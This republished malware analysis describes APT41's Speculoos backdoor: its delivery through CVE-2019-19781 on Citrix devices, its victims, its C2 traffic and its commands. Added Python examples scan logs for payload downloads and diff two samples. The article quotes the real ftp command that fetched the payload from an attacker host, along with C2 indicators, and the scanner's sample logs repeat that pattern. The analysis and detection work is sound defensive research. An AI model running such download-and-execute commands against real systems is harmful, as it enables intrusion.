
How to analyze the APT41 Speculoos backdoor

2025-01-26 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)05/31 Report--

This article explains in detail how to analyze the APT41 Speculoos backdoor. The editor is sharing it as a reference, and I hope you will have a clear understanding of the relevant points after reading it.

On March 25, 2020, FireEye released a report on a global attack campaign by APT41. The campaign, which ran between January 20 and March 11, focused on Citrix, Cisco and Zoho network devices. Using WildFire and AutoFocus data, the researchers obtained samples of the backdoor used against Citrix devices, which they named Speculoos, and identified victims across several industries in North America, South America and Europe.

Speculoos is built for FreeBSD, and a total of five samples were identified. All of the sample files are roughly the same size, with only slight differences between them. Speculoos is delivered by exploiting CVE-2019-19781, which affects Citrix Application Delivery Controller, Citrix Gateway and Citrix SD-WAN WANOP devices and allows an attacker to execute arbitrary commands remotely.

Attack details

The attacker exploits CVE-2019-19781 to remotely execute the command: `/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220 shock`

The first wave of attacks began on the evening of January 31, 2020, using a file named bsd, and affected a number of higher education institutions in the United States, medical institutions in the United States and Irish consulting firms. The second wave, which began on February 24, 2020, used a file named un and affected Colombian higher education institutions, Austrian manufacturing organizations, United States higher education institutions and state governments in the United States.

Malware for BSD systems is relatively rare, and this tool is tied to specific Citrix network devices, so Speculoos was most likely developed by APT41 specifically for this campaign.
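The initial access step above (the ADC's shell is made to fetch a file into /tmp with ftp and then run it) is what a defender would most want to catch in the device's shell logs. The following is an added example, not code from the page or from any vendor; the log lines are constructed to resemble a FreeBSD shell audit log, and the log format, host name and TEST-NET address 203.0.113.10 are all assumptions.

```python
import re
from dataclasses import dataclass

# Constructed sample log lines (not from the page or any real device).
# The first and third lines mirror the shape of the command quoted above.
SAMPLE_LOGS = [
    'Jan 31 22:14:07 ns1 sh[2211]: exec /usr/bin/ftp -o /tmp/bsd ftp://test:REDACTED@203.0.113.10 shock',
    'Jan 31 22:14:09 ns1 sh[2213]: exec /tmp/bsd',
    'Feb 24 03:02:51 ns1 sh[8870]: exec /usr/bin/ftp -o /tmp/un ftp://test:REDACTED@203.0.113.10 un',
    'Feb 24 03:10:00 ns1 sh[8901]: exec /bin/ls -la /var/log',
    'Feb 24 03:12:00 ns1 sh[8902]: exec /usr/bin/fetch -o /tmp/x http://203.0.113.10/x',
]

# A download tool writing into /tmp: capture the output path and the URL.
FTP_DOWNLOAD = re.compile(r'/usr/bin/(?:ftp|fetch)\s+(?:-\S+\s+)*-o\s+(/tmp/\S+)\s+(\S+)')
# Credentials embedded in the URL (user:pass@host), as in the quoted command.
CRED_URL = re.compile(r'^(?:ftp|https?)://([^:/@\s]+):([^@\s]+)@')
# Execution of something that lives under /tmp.
TMP_EXEC = re.compile(r'exec\s+(/tmp/\S+)')


@dataclass
class Finding:
    line_no: int
    rule: str
    detail: str


def scan(lines):
    """Flag /tmp downloads by ftp/fetch and any later execution of the dropped file."""
    findings = []
    dropped = set()  # paths written to /tmp earlier in the same log
    for i, line in enumerate(lines, 1):
        m = FTP_DOWNLOAD.search(line)
        if m:
            dest, url = m.group(1), m.group(2)
            dropped.add(dest)
            rule = 'download-to-tmp'
            if CRED_URL.match(url):
                rule = 'download-to-tmp-with-credentials'
            findings.append(Finding(i, rule, f'{dest} <- {url}'))
            continue
        e = TMP_EXEC.search(line)
        if e and e.group(1) in dropped:
            findings.append(Finding(i, 'exec-of-dropped-file', e.group(1)))
    return findings


if __name__ == '__main__':
    for f in scan(SAMPLE_LOGS):
        print(f'line {f.line_no}: {f.rule}: {f.detail}')
```

On the constructed input the scanner reports both download commands (with the credentials-in-URL rule), the execution of /tmp/bsd that follows the first download, and the plain fetch to /tmp; the `ls` line is ignored. On a real appliance the relevant log source and its line format must be confirmed first, and the download-to-/tmp rule alone will fire on legitimate administration, so the exec-of-dropped-file correlation is the higher-confidence signal.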

Binary analysis

The Speculoos backdoor is an ELF executable compiled with GCC 4.2.1 that runs on FreeBSD systems. The payload has no persistence mechanism of its own, so attackers must use additional components or other means to maintain control of the target. After the backdoor is executed, it enters a loop in which it attempts to communicate over port 443 with the C2 domain:

alibaba.zzux[.]com (119.28.139[.]120)

If that communication fails, Speculoos attempts to reach a backup C2 at 119.28.139[.]20, also over port 443. Once it connects to either C2 server, it performs a TLS handshake with the server. Figure 1 shows the packets sent to the C2 server.

The ClientHello requests login.live[.]com as the Server Name Indication (SNI).

After successfully connecting to the C2 and completing the TLS handshake, Speculoos fingerprints the target system and sends the collected data back to the C2 server. The structure of that data is shown in Table 1 below.

The data is sent through the TLS channel, and Speculoos then waits for a two-byte response from the server. After receiving the response, it sends a single byte (0x0a) to the C2 and enters a loop waiting for commands. Table 2 lists the commands the attacker can issue, which give the attacker complete control of the victim's system.

The two Speculoos samples analyzed in the study are functionally identical, differing in only eight bytes: one runs `hostname` and the other `uname -s` when collecting system information. `uname -s` returns the kernel name, and `hostname` returns the host's name. The following figure shows a binary comparison of the two Speculoos samples.
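The eight-byte difference between the two samples is the kind of thing a byte-level diff with string context surfaces immediately. The following is an added example, not code from the page: it compares two equal-size byte buffers, reports each run of differing bytes, and shows the NUL-terminated string each run falls inside. The two buffers are constructed stand-ins for the samples, not the real binaries, containing only an ELF magic, padding and the two command strings.

```python
def diff_runs(a: bytes, b: bytes):
    """Return maximal runs of differing bytes as (offset, bytes_in_a, bytes_in_b)."""
    if len(a) != len(b):
        raise ValueError('samples differ in size; align them before diffing')
    runs, start = [], None
    for i in range(len(a) + 1):
        same = i == len(a) or a[i] == b[i]
        if not same and start is None:
            start = i                      # a run of differences begins
        elif same and start is not None:
            runs.append((start, a[start:i], b[start:i]))
            start = None
    return runs


def enclosing_string(buf: bytes, offset: int) -> str:
    """Return the NUL-delimited string that contains offset, for context."""
    lo = buf.rfind(b'\x00', 0, offset) + 1
    hi = buf.find(b'\x00', offset)
    if hi == -1:
        hi = len(buf)
    return buf[lo:hi].decode('ascii', errors='replace')


# Constructed stand-ins for the two samples: identical except for one 8-byte command string.
SAMPLE_A = b'\x7fELF' + b'\x00' * 12 + b'hostname\x00' + b'/bin/sh\x00'
SAMPLE_B = b'\x7fELF' + b'\x00' * 12 + b'uname -s\x00' + b'/bin/sh\x00'


def compare_samples(a: bytes = SAMPLE_A, b: bytes = SAMPLE_B):
    """Summarise each differing run as (offset, length, string_in_a, string_in_b)."""
    return [(off, len(x), enclosing_string(a, off), enclosing_string(b, off))
            for off, x, y in diff_runs(a, b)]


if __name__ == '__main__':
    for off, n, sa, sb in compare_samples():
        print(f'offset {off:#x}: {n} bytes differ: {sa!r} -> {sb!r}')
```

On the constructed buffers this yields a single run of 8 bytes at offset 0x10 whose context strings are `hostname` and `uname -s`, matching the difference described above. For real samples of unequal size, align them by section first; a raw byte diff across a shifted layout reports everything after the shift as changed.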

Impact assessment

Internet-facing devices that let unauthenticated users execute code remotely are a serious security problem. CVE-2019-19781 affects multiple Internet-facing devices, and attackers are actively exploiting it to install custom backdoors. Much of an affected organization's network traffic passes through these devices, so an attacker who controls one can monitor or modify the network activity of the entire organization.

By default, these devices have direct access to the organization's internal systems, so the attacker does not need to perform lateral movement within the internal network. From this position an attacker can modify network traffic, inject malicious code, perform man-in-the-middle attacks, or redirect users to fake login pages to harvest credentials.

That concludes this analysis of the APT41 Speculoos backdoor. I hope the content above is helpful and that you learned something from it. If you found the article useful, please share it so more people can see it.
